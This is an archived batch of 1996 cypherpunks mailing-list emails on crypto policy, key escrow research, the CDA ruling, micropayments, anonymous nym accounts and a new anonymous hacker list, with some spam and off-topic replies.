> 
> Hi! We are delighted to announce a new mailing list, Hackerpunks! This list
> is for serious folks who know stuff about computers _AND_ want to keep
> their privacy.

Oooo.  Folks who know 'stuff' about computers.  The free world is in danger now.

> This list is UNMODERATED. Due to our organization, we are unable to 
> find out your true identity, and you are unable to find out where
> our list-bot resides. So - you can now have free discussion about all
> exploits and great hacks! Just use remailers and be safe...

Smells like 'elite'punks to me

-Blake (in a cranky mood)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WICKERT@vortex.ufrgs.br
Date: Wed, 12 Jun 1996 13:02:49 +0800
To: CYPHERPUNKS@toad.com
Subject: HomePage
Message-ID: <01I5SB8NRK040004XD@vortex.ufrgs.br>
MIME-Version: 1.0
Content-Type: text/plain


Have Toad Hall a HomePage? I tried http://www.toad.com but I got no response!

Best Regards,
Ricardo Wickert




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 12 Jun 1996 15:20:59 +0800
To: coderpunks@toad.com
Subject: Oblivious key escrow
Message-ID: <199606111854.OAA02575@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I've revised and expanded the paper on decentralized key escrow that I
presented at the Cambridge Information Hiding workshop and mentioned
here a few weeks ago.  The paper is now called "Oblivious Key Escrow",
and is available from:
	ftp://research.att.com/dist/mab/netescrow.ps    (postscript)
	ftp://research.att.com/dist/mab/netescrow.tex   (latex source)
-matt

\begin{abstract}
We propose a simple scheme, based on secret-sharing over large-scale
networks, for assuring recoverability of sensitive archived data ({\em
e.g.,} cryptographic keys).  In our model anyone can request a copy of
the archived data but it is very difficult to keep the existence of a
request secret or to subvert the access policy of the data ``owner.''
We sketch an architecture for a distributed key escrow system that
might be suitable for deployment over very large-scale networks such
as the Internet.  We also introduce a new cryptographic primitive,
{\em oblivious multicast,} that can serve as the basis for such a
system.
\end{abstract}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Wilson <serw30@gibson.cioe.com>
Date: Wed, 12 Jun 1996 18:00:59 +0800
To: Cypherpunks@toad.com
Subject: Re: Slander of Catholic Church
Message-ID: <1.5.4.32.19960611201845.0066db50@gibson.cioe.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:31 AM 6/11/96 -0400, you wrote:
>
>      Tim ,
>          You should stick to your own religion and not criticize other 
>peoples. It is unforunate that the esteem that I once felt for you is 
>dwindling because of your anti-Mormon trash. Perhaps you do not realise 
>that some people take more than an academic interest in their religion 
>;this is unforunate . It is pitiful.You are becomeing the ugly 
>American that foreigners hate; always having an opinion about everything.
>                               moroni
>
>
Hmmm.... This brings up two questions:

1. If you stick to your own religion, aren't you kind of saying the others
are bad (or don't work) anyway? Its hard to be more critical than the "I'm
going to heaven and you're not, because you don't do this...." crowd.

2. Isn't hard NOT to have an opinion about something?

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ventureweb@aol.com
Date: Wed, 12 Jun 1996 15:17:35 +0800
Subject: Venture capital financing/partnering for unique website ideas/entrepreneurs
Message-ID: <960611151902_554057529@emout14.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


 Re:	Venture Capital Funding/Venture Partnering For
 	Web Site Developers/Entrepreneurs

 Hello;

 	My firm, DataMerge, Inc.  is currently developing a program to
provide financial backing and strategic assistance for commercially
viable website development. It is my job to locate individuals with ideas
and/or plans for creating high profile,  niche market websites that, with
our assistance,  can be profitably brought to maket.

	We are very interested in unique, highly innovative, information
based sites which are targeted to meet the needs of a specific market,
industry or user group.  While we are interested in creative services
offered through the internet to a targeted group, we are not interested in
backing companies for expanding into run-of-the-mill areas such as ISP,
contract web-site design, or outsourced graphic design.

	We prefer to work with individuals or small teams (no more than
three).  Don't be discouraged if you don't have a lot of business
experience. What we look for more than anything else is creativity and
"entrepreneurial spirit." We find some of the best ideas come from
college, and even high school students.

	What we can provide the entrepreneur includes the following:

*	Strategic, marketing and business planning assistance
*	Financial support during development
*	Marketing/promotional assistance (capital, coordination and 	
	partnering)
*	Long term royalty stream from site
*	Further site development and maintenance contracts

 	DataMerge is currently the largest provider of  niche market
financing information and financing software applications to US
businesses, intermediaries and  finance professionals. DataMerge has a
user base of  21,000 individuals, and a newsletter subscriber base of
73,000.
	DataMerge has been featured in publications including Inc.,
 Financial Times, Entrepreneur, Success, Denver Post, and LA Times to
 name a few.

	If you wish to be considered for this program, please email me
(Spencer Kluesner, CEO, DataMerge, Inc.) at VentureWeb@aol.com.
Please provide a brief (one page or less) description of the website you
propose to develop.

	Snail mail:

DataMerge, Inc.
Website Development Dept
1720 S. Bellaire Suite 310
Denver, CO 80222




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Wed, 12 Jun 1996 15:53:39 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Britain to control crypto - official (fwd from Usenet)
Message-ID: <2.2.32.19960611222532.00d35584@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:07 PM 6/11/96 -0400, David Lesher wrote:
>The British government quietly announced yesterday that it will
>legislate to restrict crypto. The details are in the attached
>Reuters and PA newswires.

So I didn't see any move top 'restrict crypto' in the two wire stories.
It looked like the return of clipper with escrow agents other than government
which seems *almost* reasonable when I note that they are not mandating any of
this stuff.

Still given the close relationship between Cheltenham and Ft Mead one is left
wondering what the real story is ...

John Pettitt, jpp@software.net
EVP, CyberSource Corporation, 415 473 3065

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 12 Jun 1996 17:26:23 +0800
To: cypherpunks@toad.com
Subject: CDA decision TOMORROW 9 am!
Message-ID: <Pine.SUN.3.91.960611154828.21337C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


The CDA deathwatch is almost over.

The Philadelphia court will announce its decision tomorrow, 6/12, at 9 AM 
EST, according to a fax from the court.

Check the usual web sites for more info and breaking news on the decision:

http://fight-censorship.dementia.org/top/
http://www.eff.org/
http://www.vtw.org/
http://www.aclu.org/
http://www.epic.org/
http://www.cdt.org/

The ACLU is holding a press conference in NYC at 11 am. The ALA/CIEC 
plaintiffs will be holding a press conference in Washington, DC at 12 noon.

For the latest information, subscribe to the fight-censorship-announce
mailing list by sending "subscribe fight-censorship-announce" to
majordomo@vorlon.mit.edu. 

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Wed, 12 Jun 1996 17:23:02 +0800
To: cypherpunks@toad.com
Subject: RSA patents in Canada
Message-ID: <199606112304.QAA22657@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Anyone have a definitive source on the state of the RSA patent
in Canada? Thanks.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 12 Jun 1996 12:46:12 +0800
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: ANNOUNCEMENT: HACKERPUNKS MAILING LIST
In-Reply-To: <96Jun11.101251edt.10956@cannon.ecf.toronto.edu>
Message-ID: <Pine.LNX.3.93.960611160145.176A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 11 Jun 1996, SINCLAIR  DOUGLAS N wrote:

> I don't have a C2 account, and don't really want to pay for one.
> I trust someone will put the hackerpunks archives on the web so
> the rest of us can read them.

Alpha nyms are free.  See http://alpha.c2.org for details.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMb3RXrZc+sv5siulAQGHtQQApTTIrifjyfZtQiUMF3AsTnHoAeCVlYWm
/siLEzaEfFcpmYUrNNb2GMrLiH5S/rpKRpPfLgojJ9ezRdNO7CnEj+4zZl1vK4a2
jkeRC8HZIW3oPpFbPGrAbowKirBZNJm/egfdWQoks4moNT2VCg8EjOzBm2gOwXX4
6wqWv0PRah0=
=9DP7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 12 Jun 1996 13:18:17 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Britain to control crypto - official (fwd from Usenet)
Message-ID: <199606112007.QAA01167@nrk.com>
MIME-Version: 1.0
Content-Type: text



The British government quietly announced yesterday that it will
legislate to restrict crypto. The details are in the attached
Reuters and PA newswires.

Fuller details will no doubt be available at a one day workshop
that the Ministry of Defence is organising at the IEE in Savoy
Place on the 27th June. The speakers will include directors of
both CESG (GCHQ's front operation) and DRA, as well as a policeman
and the data protection registrar. The IEE's phone number is 0171
240 1871.

Ross



RTf  06/10 1355  UK to license information encryption services

    LONDON, June 10 (Reuter) - The British government unveiled proposals on
Monday aimed at meeting the demand for encryption services to safeguard the
confidentiality of electronic information transmitted on public
telecommunications networks.

    Technology minister Ian Taylor published a paper proposing a licensing
system for so-called "Trusted Third parties," or TTPs, to provide encryption
services.
    "The TTPs would offer digital signature, data integrity and retrieval, key
management and other services for which there is a commercial demand," Taylor
said in a written parliamentary answer.
    Taylor said encryption services would facilitate the development of
electronic commerce, thus helping to maintain Britain's competitiveness.
    The licensing policy would aim to protect consumers as well as to preserve
the ability of intelligence and law enforcement agencies to fight serious crime
and terrorism, Taylor said.
    This would be done by establishing procedures for disclosure to them of the
encryption keys, under safeguards similar to those which already exist under 
the Interception of Communications Act, he added.
    Taylor said officials in his department had already held preliminary
discussions with industry groups on the concepts set out in Monday's paper.
    Following consultation by the Department of Trade and Industry on detailed
proposals, the government intends to bring forward legislation, Taylor added.


PA   06/10 1808  MOVE TO STRENGTHEN INFORMATION SECURITY

  By Parliamentary Staff, PA News
   The Government tonight announced plans to strenthen the security of
information sent electronically over public telecommunications networks.
   Technology Minister Ian Taylor, in a Commons written reply, disclosed
proposals to licence trusted third parties to provide encryption services -- 
the process of transforming text into an unintelligible form that can only
subsequently be recovered by someone possessing the corresponding decryption
key.
   These services cover the digital signature, an electronic equivalent of a
hand-written signature, of electronic documents and the protection of the
accuracy and privacy of contents.
   Mr Taylor said: "There is a growing demand for encryption services to
safeguard the integrity and confidentiality of electronic information
transmitted on public telecommunications networks.
   "The Government therefore proposes to make arrangements for licensing 
trusted third parties who would provide such services." These would include 
digital signature, data integrity and retrieval and key management services.
   "The licensing policy will aim to protect consumers as well as to preserve
the ability of the intelligence and law enforcement agencies to fight serious
crime and terrorism by establishing procedures for disclosure to them of the
encryption keys, under safeguards similar to those which already exist for
warranted interception under the Interception of Communications Act."
   Mr Taylor, who disclosed publication of a paper, said it was intended to
bring forward proposals for legislation after consultation on detailed policy
proposals.
   The Trade and Industry Department said increased use of IT systems by 
British business and commerce was a major factor in their improved competitive 
position, but had brought increased security risks -- especially concerning 
integrity and confidentiality of information passed electronically between 
trading bodies.
   Prime candidates to be trusted third parties could include banks, network
operators and trade associations.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close...........(v)301 56 LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead........vr vr vr vr.................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 12 Jun 1996 13:37:30 +0800
To: hackerpunks-owner@alpha.c2.org
Subject: Re: ANNOUNCEMENT: HACKERPUNKS MAILING LIST
In-Reply-To: <199606110351.FAA03834@basement.replay.com>
Message-ID: <Pine.LNX.3.93.960611160640.176B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 11 Jun 1996, Anonymous wrote:

> Hi! We are delighted to announce a new mailing list, Hackerpunks! This list
> is for serious folks who know stuff about computers _AND_ want to keep
> their privacy. The submission address is an anonymous alias,
> hackerpunks@alpha.c2.org. It is anonymous because _I_ want to keep my
> privacy and do NOT want to answer stupid questions. To further _your_
> privacy, we can subscribe ONLY anonymous aliases user_name@alpha.c2.org.
> Mailing list messages will be forwarded to your alpha.c2.org adresses 
> through anonymous remailers.

You might also want to let anonymous aliases user_name@nym.jpunix.com
subscribe.  It doesn't have many aliases in use, but it probably will become
more popular.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMb3SabZc+sv5siulAQHg1AQAsEqbbbm63WVyBtkEYogVOHgRsPk6oc4r
4sV7QysT0CfzoE7pGqEFpKwwCi6BGqK6IydxauGELbVDtpV/iiWwGu9l6bD1WlQW
0q/DhngWFMysb4/Z7myBc4kq/zRNagemnjSlAxlvSjqjEbjcqF/7ex3sjQ6+xcX2
d8cUjBP0dn8=
=0b4v
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stephan Vladimir Bugaj" <stephan@studioarchetype.com>
Date: Wed, 12 Jun 1996 17:06:12 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Micropayments are Crap
In-Reply-To: <v03006f04ade3579bc415@[204.162.75.169]>
Message-ID: <v03006f00ade3a25564ae@[204.162.75.169]>
MIME-Version: 1.0
Content-Type: text/plain


>... how much data
>mining is starting to catch on and the positive, quantifiable
>returns it is generating.
>
Returns for whom?

>can people "automagically" take money from your ATM card? nope. in the
>same way, your microwallet will be secure. it will be even more secure,
>because less money is involved.
>
How much money is involved would be up to the consumer.  It would be as secure
as a normal wallet, excepting that I don't usually give people permission to
open my wallet and take money out at regular intervals.

[...]
>can ensure that the money is transferred. the data is not delivered
>unless the payment is received. scam artists can be caught with
>"better business bureau" type rating services.
>
Any cryptographic system has ways to circumvent it.  Whether or not they
are practical is the issue.
As for scam artists, perhaps we could have a scam-artist bit along with
the age bit ;)

>the poster clearly suggested payment PER TIME as a limit.  a pretty
>obvious concept, and easy to implement, don't you think? why does it
>figure as one of your major objections?
>
Because the time limit can be set ridiculously low, making the rates
artificially high from the viewpoint of the kind of time periods that
humans work in.

>it won't happen with micropayments either, because it will be *your*wallet*
>that tells you when it is has an opportunity to pay. no one is dipping
>into your wallet, metaphorically. the actions are always initiated by you.
>
The action of going somewhere that charges a metered rate is initiated by the
user, however to make this safe for the consumer it would have to be required
that there be a 'front door' for every site that charged metered rates
announcing that if you proceed you'll be billed (and, at what rate).  If you
let people charge as soon as you hit their URL, that's malarkey.

>somewhat. mainframes aren't totally the mark of the devil. don't you pay
>your internet provider per hour? how many people do? isn't a Sun pretty
>
No, I don't.  I use it too much, so I found an ISP that does not charge metered
rates.  A lot of people pay by the hour for their ISP, but it may or may not
be a wise idea for them.  If it's part of their work and they're online all the
time, they should consider another payment system.  Same thing with charging
micropayments for using software.  If Adobe started charging me $5/hr to use
Photoshop instead of $500 for the package, I'd stop using photoshop.  In two
weeks I'd have already exceeded the price of the whole package.

>much equivalent/similar in processing power & capability to old mainframes?
>you raise all kinds of objections that make no sense to me.
>
Sure it's the same power as an old mainframe.  Big deal.  What exactly does
that
do to stregnthen your argument?  It's certainly not as costly to build, costly
to maintain, or rare as old mainframes...

>the user is always free to go where a better vendor gives him what he
>wants. because the user can now pay in tiny increments, he has enormous
>increase freedom. he can move between different services far more readily.
>no body is FORCING anyone to spend money.
>
The potential for scams exists.  Certainly even a priest in the church of the
free market can see that.  User education is poor, and consumer protection laws
are weakening.  This does not bode well fo r

>uh huh. what if over your lifetime it cost far less than you pay for
>a shinkwrapped package?
>
If that happened, I'd be very suprised.

>what if you only needed a quick compilation on
>a system you don't normally use? I think you will begin to figure out
>some advantages if you use your imagination to find them (instead of the
>drawbacks)
>
That is a good advantage, you are correct in this.  But there are a number of
instances in which I'd still want software running on a real workstation.  If
people make software only available through micropayments, then that would be
limiting to both the user and the vendor.

>you have this concept of "automated billing" that simply doesn't fit. people
>know how much they are being charged. the payment is UNDER THE COMPLETE
>CONTROL OF THE PAYER, NOT THE BILLER. this simple misconception seems to
>underly a lot of the micropayment objections I've been seeing.
>
The payer could set a certain amount of money that is automatically deemed
acceptable to pay, like the $.02/time-unit example.  This could get misused
by a vendor who chooses a unit small enough that a small per-unit charge
quickly
adds up.  The payer essentially loses control of payment.

>or, it may be that entire new industries spring up because the software
>companies are better able to be compensated for their work from skittish
>consumers. people may be more free about spending micropayments than
>buying shrinkwrapped software. psychologically I think micropayments
>are far more appealing in some ways.
>
In some ways.  But those of use who use certain packages heavily would get
shafted for our loyal support of a vendor if they decided to pander to the
skittish masses and charge a rate that was psychologically more appealing
to
those who wouldn't otherwise use it.  I only hope that vendors who choose to
use micropayments (since they're inevitable) take the small but loyal power
user segment into consideration when making the decision about whether or not
to stop selling full packages altogether.

>admittedly some things have to be in place: a high speed network, and
>other infrastructure ideas. it isn't totally feasible today in cyberspace,
>but large parts of it are and are already being implemented (chaum's
>digicash)
>
The best model is not the mainframe model promoted by the idea of the "internet
computer" (aka. Mutant X-Terminal), but a truly distributed system.
Workstations and PCs can contribute their substantial processing power to a
distributed system.  The other problem I have with the mainframe model and
centralized resources is storage.  It's bad enough to have to wait in line for
a CPU, but the idea of having no direct access to my work is unappealing,
and for a number of industries impossible.  I doubt designers, for example,
would
be willing to leave client work on the big Illustrator server cluster at Adobe.
Fat pipes connecting fast PCs to even faster servers is the best route.


>false, imho. imagine that I can buy only the shows I want to watch, and it
>>out to less than my $20 monthly cable bill. economically this is perfectly
>sensible. people want to pay for what they watch. you seem to think that
>
I was looking at this from a vendor viewpoint in this particular instance.  The
TV old guard may not be willing to give up all that big, fat (and reliable) ad
revenue to the whim of John and Jane Q. Tvwatcher.

>micropayments means "everything costs more". a strange assumption. what if
>I assume, "everything costs less" because billing costs, which other
>posters have pointed out are so enormous, are vaporized?
>
I'd like to see them vaporized.  Billing costs are the swindle of the decade.
I'm quite tempted to cut up both my credit card and ATM card because of the
bullshit administrative fees involved with using them.  Internet transaction
fees are even worse.

>it is true that some industries will change and meld into other forms
>with this new revolutionary form of payment.  welcome to the concept of
> an economy in which anything that is stagnant tends to die.
>
Yeah, but the old tends to cling on for dear life.  Welcome to the concept
of people and institutions that are unwilling to change and do their best to
postpone those changes.

Change doesn't bother *me* personally, I just wish more people would *think*
about whether or not changes are *appropriate* instead of just *possible*.

>right. shows that are not watched are going to go extinct. why should
>advertisers fund them? you think that advertisers have to be fooled
>to pay money to a show?
>
They are now.  It was a pragmatic point.

>that's correct. why do you suggest it would be an infeasible apocalypse?
>it might be an apocalypse of old concepts, but it isn't infeasible.
>
That's not infeasable.  I didn't say anything was infeasable, I just think
some of the current models of how things might work are bad ideas and encourage
debate.  Both consumers and resistant old-school vendors will have issues to
address, and ramming change down people's throats because it's inevitable or
'the market dictates it' is a crappy attitude which I don't encourage.  Also,
note for the record that I don't believe that "the market" is a one-to-one
mapping on to "the people" or even "the consumer".

>false, imho. again the consumer maintains complete control. in a sense
>they have far greater control. if they don't like a company they
>can go somewhere else after only spending a micropayment instead of
>a macropayment. you may find that companies increase their level of
>service and customer satisfaction. but there will probably bogus uses
>that apparently you will gravitate towards, based on your seeming
>preference for them.
>
Ha ha ha.  Yeah, looking out for consumer interests is just doom saying and
negativism.  The current education level of the general public about computers
is low, and about transactional security is even lower.  It can have benefits,
but there are also serious issues which need to be considered.  Another thing
about the paying a micropayment instead of a macropayment and leaving if
you don't like it - a lot of companies offer free trial time with their
service, or a free consultation, etc.  The effects of charging for these
trial offers is
unclear - how would that be good for the consumer?

>imagine shareware authors getting cash for their programs based on their
>actual use. imagine artists and writers bypassing corporate monoliths
>and marketing their work to the public directly, bypassing the enormous
>scrape-off that these self-perpetuating bureacracies snarf.
>
This is a good idea.  It could be a good boon for small businesses (unless
the transaction providers charge prohibitively large fees for their
services...).  I hope you're right and I'm wrong.  That would be much better
for all involved.

>you seem to start from the assumption, "businesses are out to shaft the
>little guy". well, that can be true whether you have micropayments
>or not. I doubt micropayments would make it any worse. it won't solve
>the problem (I agree there is a great greed in places) but it may actually
>make it far more difficult for companies to shaft people, once you think
>about it. remember, the consumer has total control. how can you get
>shafted when you have total control?
>
Your argument works provided the consumer really maintains control.
You can lose that control.  There do need to be safeguards in such a system
that ensure this control.  $.02/nanosecond is, after all, $1.2 billion/minute.
If such a setting were allowed and people habitually allowed $.02/unit
metering as being automatically acceptable, that could clean out a number
of digital
wallets very quickly as unsuspecting customers entered the paid area and
instantly got dialogue boxes announcing that their wallets were empty.

ttl
Stephan


-------------------------------------------------------------------
This signature has been kidnapped by space aliens.
If you find it you can call (415) 703-8748.
I work for Studio Archetype, and they don't find any of this funny.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 12 Jun 1996 16:48:22 +0800
To: cypherpunks@toad.com
Subject: Re:Micropayments are Crap
Message-ID: <v02140b02ade3b261dff2@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Stephan Vladimir Bugaj <stephan@studioarchetype.com> writes:
>
> Micropayment proponents are incredibly fond of the proposition that software
> could be leased on a usage time basis from a centralized server, and people
> could also rent time on the servers' CPUs.  Sounds an awful lot like the
> mainframe days to me.

Well, at the risk of being branded a heretic, maybe the mainframe days were
not as bad as you assume...  Back in "the mainframe days" computers cost
hundreds of thousands of dollars, and the best way to most efficiently use
that resource was to tiemsharing.  Currently I would guess that 2/3 of the
possible CPU cycles in the world go unused, wasted by machines that are
turned off sitting in someones den or running a screensaver in the cubicle of
some drone in the marketting department.  With micropayments one can purchase
access to these cycles and put them to use, allowing the user to recover
costs when they are not using their system and giving the user cheap access
when needed to computing resources way beyond what they would be capable of
purchasing themselves.

> I see plenty of ways in which this benefits the vendor (greater control
> over distribution, centrailzed revision/upgrade distribution, greater
> profits over one-time sales, etc.), but no ways in which this benefits
> the user.  Especially the power user.

Some advantages to the user:

        -Faster and more frequent upgrades and bug fixes.  No need to
         wait for the CD or floppies to be shipped.
        -Better responsiveness from the vendor/distributor.  Currently once
         you buy a program you are stuck with it, warts and all.  A "test
         drive" is not an option, so vendors are led by their marketting
         droids.  With online "rental" the user has the ability to try a
         program before plunking down their $69.95 and possibly ending up
         with an unusable collection of annoying bugs.  This also means
         that they have the option of selecting a different program without
         risking paying the entire cost of a program they do not really want
         but which had good advertising.  Software vendors will be forced to
         actually pay attention to the users _after_ the initial sale and will
         also be motivated to create and provide more customized niche programs
         so you end up with a better selection of software as well.
        -Access to programs which the user could not normally afford or would
         not use enough to justify the purchase price.  I am not a chip
         designer and am not interested enough to drop $20K on a VHDL simulator
         and design synthesis program, but I would be willing to pay several
         dollars an hour to play around with one.


> I'm certainly not going to rent time
> on a compiler or image editing program every single time I want to do some
> work.

Then buy the program yourself, and then wait overnight for that ray tracing
and rendering program to complete two frames of that animated logo for your
kewl web page.  No one is saying that everything wll go to micropayments, in
some cases for software which is used constantly it does make more sense to
buy the program outright but in most cases you end up using the other programs
which clutter your hard disk a lot less than you think.  By renting your
non-essential programs you save money.

> It took the industry long enough to get PCs and workstations to the speeds
> they're at today so people could do their own work on their own machines to
> go back to waiting in a queue for time on a centralized system so you can
> have the honor of paying someone a lot of money to run your job.

How did you make the leap from micropayments (remember that "micro" prefix)
to paying someone a lot of money to run your job.  With micropayments you
can pay a lot of people a very small amount of money to run your job and
get it done orders of magnitude faster than someone stuck with a lone PC.
You also avoid getting caught up in the hardware game.  Just a few years
ago everyone was told they needed to upgrade their 386SX to a 486 or 486DX2
or they would be left behind, now everyone simple must have a Pentium, and
tomorrow it will be the next chip du jour.  By only requiring the hardware
necessary for user interaction on the desktop one can get better economies of
scale (hence the so-called "Network Computer")  If you could get by with
having a 486 on your desk running the presentation and interface level and
then rented cycles on a huge cluster of pentium cycle servers to get real work
done you would probably end up saving money in the long run, and would not need
to run out to Fry's every year/month/week to upgrade your hardware with new
pieces which would soon be obsolete.

jim








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 12 Jun 1996 16:25:52 +0800
To: Alex Strasheim <cypherpunks@toad.com
Subject: Re: plugging in
Message-ID: <2.2.32.19960611205625.0075a388@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:05 PM 6/11/96 -0500, Alex Strasheim wrote:
>Doing tech support at my ISP has made me very skeptical of anything that
>requires a plug in.  Most people aren't willing or able to download and
>install them. 

I have installed, RealAudio as have many other people.  Likewise
Streamworks.  I agree with your general point about general plugins but
plugins for specific purposes will be deployed (at least until Netscape
includes the capabilities).

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@localhost.netcom.com (Jamie Lawrence)
Date: Wed, 12 Jun 1996 16:41:38 +0800
To: Brian Behlendorf <brian@organic.com>
Subject: Re: Micropayments: myth?
Message-ID: <v02140b03ade3bafe0390@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Brian describes a UI metaphor for micropayments, with a gauge
indicating the value of your micropayment purse and a cutoff for
the maximum automatic per-unit payment:

>Now, let's consider bridging this metaphor into the micropayments world.
>Imagine that surfing the web is like driving a car - you'll dribble out
>small amounts of money over a period of time, but as long as you watch
>your speedometer (the rate at which you spend money) and the feul tank
>levels (the amount of coinage in your wallet), you are in control of your
>spending rates.  Whether you approve every micropayment explicitly, or
>you set a minimum level below which requests for payments are automagically
>granted, is up to you.  Me, I'd probably be alright with just about any
>site I go to asking for less than $.02 for any action I take.  Anything
>above that, I want to be explicitly asked.  My user interface has a gas
>gauge and a speedometer in the upper-right-hand corner instead of a
>throbbing "N".  When my levels are low, I go visit my bank and "refill"
>my wallet.  Voila!

That's fine so long as the majority of sites one visits all cost within,
say, an order of magnitude or so.

What happens if people skip around a lot? When I go from checking out
Hagbard's Poetry Corner, which charges $.02 cents per page (and falls
below the speedometer cutoff), and switch over to Belbo's Future's
Tips Market, which charges a dollar a page, I'm going to get annoying
alerts every click. If one allows customizing the cutoff for each page,
the guage becomes meaningless (as much as if your car occasionally sucked
half the gas tank at one stoplight). If you don't, it is annoying.

Sure, $1.00 a page, perhaps, pushes the micropayment scale, but
I'm sure there are plenty of folks who would set the cutoff in
that range or higher.

Perhaps a graphical relation-o-meter, comparing some user defined
scale to the cost of the current page, so that users could get a
relative feel for high rent districts (Web-rent control, anyone?),
but I can see pitfalls to this appoach, too.

I don't think this works unless the micropayments world standardizes
on a very narrow price band, which isn't very likely, or people are
found to stick pretty consistently to a given price when browsing,
which I don't think is very likely either.

>And yes, I am presuming a system involving transfers of digitally signed
>tokens of some sort.  I don't think this is a mistaken presumption.

It strikes me as perhaps more useful for account-driven billing systems,
where one has a contanst quanta of payment magnitude.

-j

--
The signal is the noise.
____________________________________________________________________
Jamie Lawrence   mailto:jal@cyborganic.net  mailto:foodie@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 12 Jun 1996 15:42:22 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: Anonymous return addresses
In-Reply-To: <Pine.LNX.3.93.960608224227.128A-100000@gak>
Message-ID: <Pine.SV4.3.91.960611172935.20391B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone "give away the Ending" of Cliff Stoll's book - and describe 
the basic methodology used to track back to the German hacker?

I don't have time to read the book. I don't need to understand all the 
little nuanced details, I just want to know the "trick".

Yours in couch potato'dom,
{your humble servant}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Wed, 12 Jun 1996 16:31:45 +0800
To: SINCLAIR  DOUGLAS N <cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: HACKERPUNKS MAILING LIST
Message-ID: <1.5.4.16.19960611233513.32d77d72@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10.12 AM 6/11/96 -0400, SINCLAIR  DOUGLAS N wrote:
>I don't have a C2 account, and don't really want to pay for one.
>I trust someone will put the hackerpunks archives on the web so
>the rest of us can read them.

C2 nym accounts are free.

===============================================================================
David Rosoff (nihongo o chiisaku dekimasu)  ------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
===
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." <---- "Ulysses", by Alfred, Lord Tennyson

